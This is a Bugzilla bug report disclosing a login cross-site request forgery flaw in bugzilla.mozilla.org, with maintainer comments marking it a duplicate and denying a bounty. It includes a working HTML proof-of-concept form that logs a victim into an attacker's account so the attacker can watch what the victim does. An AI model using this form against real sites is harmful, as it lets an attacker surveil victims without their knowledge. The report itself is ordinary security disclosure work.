992094 - csrf login in bugzilla

Status: RESOLVED DUPLICATE of bug 713926

(bugzilla.mozilla.org :: General, defect)

Description

[mar adrian belen]

User Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36

Steps to reproduce:

Attacker creates a fake account 
make a csrf login like below
then monitor actions performed by the victim or even interact with him



poc


<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://bugzilla.mozilla.org/index.cgi" method="POST">
      <input type="hidden" name="Bugzilla&#95;login" value="attacker_email" />
      <input type="hidden" name="Bugzilla&#95;password" value="password" />
      <input type="hidden" name="Bugzilla&#95;remember" value="on" />
      <input type="hidden" name="GoAheadAndLogIn" value="Log&#32;in" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>



Actual results:

can monitor the victim

Comment 1

[Curtis Koenig [:curtisk-use curtis.koenig+bzATgmail.com]]]

duped bug 992095 which had this additional comment
(In reply to mar adrian belen from comment #1)
> https://hackerone.com/reports/547

Comment 4

[Stefan Arentz | :st3fan | ⏰ EST | he/him]

This is a correct find.

We do have a bug on file to fix this, bug 713926, and it actually looks like there was a patch submitted.

Unfortunately that patch landed in Bugzilla v4.4.3 and up while Mozilla still runs an older Bugzilla 4.2.7.

Comment 5

[Stefan Arentz | :st3fan | ⏰ EST | he/him]

Sorry for the confusion by setting the bounty flag on this one. This bug has multiple dupes and those were rejected for bounties earlier:

https://bugzilla.mozilla.org/show_bug.cgi?id=981186
https://bugzilla.mozilla.org/show_bug.cgi?id=966183

So I have removed the sec-bounty flag and the bug will not be triaged for bounty eligibility.